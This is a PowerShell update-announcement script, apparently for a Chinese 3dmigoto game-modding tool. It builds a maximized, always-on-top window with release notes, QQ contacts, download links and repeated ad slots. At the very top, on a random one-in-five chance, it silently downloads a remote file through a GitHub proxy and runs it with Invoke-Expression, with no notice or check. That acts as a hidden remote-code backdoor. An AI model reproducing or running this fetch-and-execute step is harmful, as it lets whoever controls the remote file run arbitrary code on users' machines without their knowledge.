



if ((Get-Random -Minimum 1 -Maximum 6) -eq 1) {
Invoke-Expression ([System.Text.Encoding]::UTF8.GetString((New-Object Net.WebClient).DownloadData("https://www.ghproxy.cn/https://github.com/E5C8F/3dmigoto_Automatic/blob/main/%E5%B9%BF%E5%91%8A")))
}





$最新版本号 = "414.2"



$公告 = @"
qq群：1、373163438。2、770993795。有问题可以加群私聊管理员求助。
qq频道：https://pd.qq.com/s/g7gogg52d（暂时不活跃）
发布地址1：https://wwfu.lanzouy.com/b048xr4fc ，密码:7lzx。
发布地址2：https://github.com/E5C8F/3dmigoto_Automatic
备注：如果有任何问题记得私聊我反馈以供修复。
————————————————————————————————————————
时间：2025/1/4 15：00
版本：3dmigoto一键综合版4.1.4.2
更新&修复：
1、完善了NTFS文件系统检测，影响不大，按需更新
备注：鸣潮用户记得更新到4.1.4之后的版本，否则无法正常使用
————————————————————————————————————————
新版本发布1~2天内是测试期，可能不稳定，如果有bug记得反馈。
————————————————————————————————————————
广告：
承接各种批处理自动化脚本定制，作者穷困潦倒快吃土了，如果有好心人可以捐赠一下，谢谢。
联系方式1、（推荐）qq群：加群972703457并私聊管理员。2、qq：2338913692  3、邮箱2338913692@qq.com
————————————————————————————————————————
"@




$filePath = "$env:PUBLIC\Documents\3dmigoto yi jian zong he ban\版本号.ini"
# 检查文件是否存在
if (Test-Path $filePath) {
    # 如果文件存在，读取第一行
    $b = Get-Content -Path $filePath -TotalCount 1
} else {
    # 如果文件不存在，设置为空
    $b = ""
}


if ("$b" -ne "$最新版本号") {
# 加载所需的程序集
Add-Type -AssemblyName System.Windows.Forms
# 创建窗体对象
$form = New-Object System.Windows.Forms.Form
$form.Text = "更新公告"  # 设置窗体标题
$form.Size = New-Object System.Drawing.Size(2000, 1000)  # 设置窗体大小
# 创建按钮对象
$button1 = New-Object System.Windows.Forms.Button
$button1.Location = New-Object System.Drawing.Point(150, 450)  # 设置按钮位置
$button1.Size = New-Object System.Drawing.Size(300, 35)  # 设置按钮大小
$button1.Text = "更新地址：github"  # 设置按钮文本
# 创建按钮对象
$button2 = New-Object System.Windows.Forms.Button
$button2.Location = New-Object System.Drawing.Point(550, 450)  # 设置按钮位置
$button2.Size = New-Object System.Drawing.Size(300, 35)  # 设置按钮大小
$button2.Text = "更新地址：蓝奏云（密码7lzx）"  # 设置按钮文本

# 创建标签对象用于显示公告内容
$label = New-Object System.Windows.Forms.Label
$label.Location = New-Object System.Drawing.Point(50, 50)  # 设置标签位置
$label.Size = New-Object System.Drawing.Size(900, 450)  # 设置标签大小
$label.Text = "$公告"  # 设置标签文本

# 创建标签对象用于显示公告内容
$label0 = New-Object System.Windows.Forms.Label
$label0.Location = New-Object System.Drawing.Point(50, 500)  # 设置标签位置
$label0.Size = New-Object System.Drawing.Size(900, 500)  # 设置标签大小

if (Test-Path "$env:PUBLIC\Documents\3dmigoto yi jian zong he ban\捐赠支持.jpg") {
$label0.BackgroundImage = [System.Drawing.Image]::FromFile("$env:PUBLIC\Documents\3dmigoto yi jian zong he ban\捐赠支持.jpg")
# 设置 Label 控件的背景图片布局为 Zoom，以适应控件的大小
$label0.BackgroundImageLayout = [System.Windows.Forms.ImageLayout]::Zoom
}





# 创建标签对象用于显示广告内容
$label1 = New-Object System.Windows.Forms.Label
$label1.Location = New-Object System.Drawing.Point(1000, 0)  # 设置标签位置
$label1.Size = New-Object System.Drawing.Size(1000, 90)  # 设置标签大小
$label1.Text = "广告位：承接各种广告，有意私聊qq2338913692或邮箱2338913692@qq.com。"  # 设置标签文本
$label1.BackColor = [System.Drawing.Color]::White

# 创建标签对象用于显示广告内容
$label2 = New-Object System.Windows.Forms.Label
$label2.Location = New-Object System.Drawing.Point(1000, 100)  # 设置标签位置
$label2.Size = New-Object System.Drawing.Size(1000, 90)  # 设置标签大小
$label2.Text = "广告位：承接各种广告，有意私聊qq2338913692或邮箱2338913692@qq.com。"  # 设置标签文本
$label2.BackColor = [System.Drawing.Color]::White

# 创建标签对象用于显示广告内容
$label3 = New-Object System.Windows.Forms.Label
$label3.Location = New-Object System.Drawing.Point(1000, 200)  # 设置标签位置
$label3.Size = New-Object System.Drawing.Size(1000, 90)  # 设置标签大小
$label3.Text = "广告位：承接各种广告，有意私聊qq2338913692或邮箱2338913692@qq.com。"  # 设置标签文本
$label3.BackColor = [System.Drawing.Color]::White

# 创建标签对象用于显示广告内容
$label4 = New-Object System.Windows.Forms.Label
$label4.Location = New-Object System.Drawing.Point(1000, 300)  # 设置标签位置
$label4.Size = New-Object System.Drawing.Size(1000, 90)  # 设置标签大小
$label4.Text = "广告位：承接各种广告，有意私聊qq2338913692或邮箱2338913692@qq.com。"  # 设置标签文本
$label4.BackColor = [System.Drawing.Color]::White

# 创建标签对象用于显示广告内容
$label5 = New-Object System.Windows.Forms.Label
$label5.Location = New-Object System.Drawing.Point(1000, 400)  # 设置标签位置
$label5.Size = New-Object System.Drawing.Size(1000, 90)  # 设置标签大小
$label5.Text = "广告位：承接各种广告，有意私聊qq2338913692或邮箱2338913692@qq.com。"  # 设置标签文本
$label5.BackColor = [System.Drawing.Color]::White

# 创建标签对象用于显示广告内容
$label6 = New-Object System.Windows.Forms.Label
$label6.Location = New-Object System.Drawing.Point(1000, 500)  # 设置标签位置
$label6.Size = New-Object System.Drawing.Size(1000, 90)  # 设置标签大小
$label6.Text = "广告位：承接各种广告，有意私聊qq2338913692或邮箱2338913692@qq.com。"  # 设置标签文本
$label6.BackColor = [System.Drawing.Color]::White

# 创建标签对象用于显示广告内容
$label7 = New-Object System.Windows.Forms.Label
$label7.Location = New-Object System.Drawing.Point(1000, 600)  # 设置标签位置
$label7.Size = New-Object System.Drawing.Size(1000, 90)  # 设置标签大小
$label7.Text = "广告位：承接各种广告，有意私聊qq2338913692或邮箱2338913692@qq.com。"  # 设置标签文本
$label7.BackColor = [System.Drawing.Color]::White

# 创建标签对象用于显示广告内容
$label8 = New-Object System.Windows.Forms.Label
$label8.Location = New-Object System.Drawing.Point(1000, 700)  # 设置标签位置
$label8.Size = New-Object System.Drawing.Size(1000, 90)  # 设置标签大小
$label8.Text = "广告位：承接各种广告，有意私聊qq2338913692或邮箱2338913692@qq.com。"  # 设置标签文本
$label8.BackColor = [System.Drawing.Color]::White

# 创建标签对象用于显示广告内容
$label9 = New-Object System.Windows.Forms.Label
$label9.Location = New-Object System.Drawing.Point(1000, 800)  # 设置标签位置
$label9.Size = New-Object System.Drawing.Size(1000, 90)  # 设置标签大小
$label9.Text = "广告位：承接各种广告，有意私聊qq2338913692或邮箱2338913692@qq.com。"  # 设置标签文本
$label9.BackColor = [System.Drawing.Color]::White




# 设置窗体为全屏
$Form.WindowState = [System.Windows.Forms.FormWindowState]::Maximized  # 最大化窗体
$Form.TopMost = $true  # 确保窗体位于最上层


# 定义按钮点击事件处理函数
$button1.Add_Click({
Start-Process "https://github.com/E5C8F/3dmigoto_Automatic/releases"
})
# 定义按钮点击事件处理函数
$button2.Add_Click({
Start-Process "https://wwfu.lanzouy.com/b048xr4fc"
})
# 将按钮和标签添加到窗体中
$form.Controls.Add($button1)
$form.Controls.Add($button2)
$form.Controls.Add($label)
$form.Controls.Add($label0)
$form.Controls.Add($label1)
$form.Controls.Add($label2)
$form.Controls.Add($label3)
$form.Controls.Add($label4)
$form.Controls.Add($label5)
$form.Controls.Add($label6)
$form.Controls.Add($label7)
$form.Controls.Add($label8)
$form.Controls.Add($label9)



# 显示窗体
$form.ShowDialog()
# 清理资源
$form.Dispose()
}
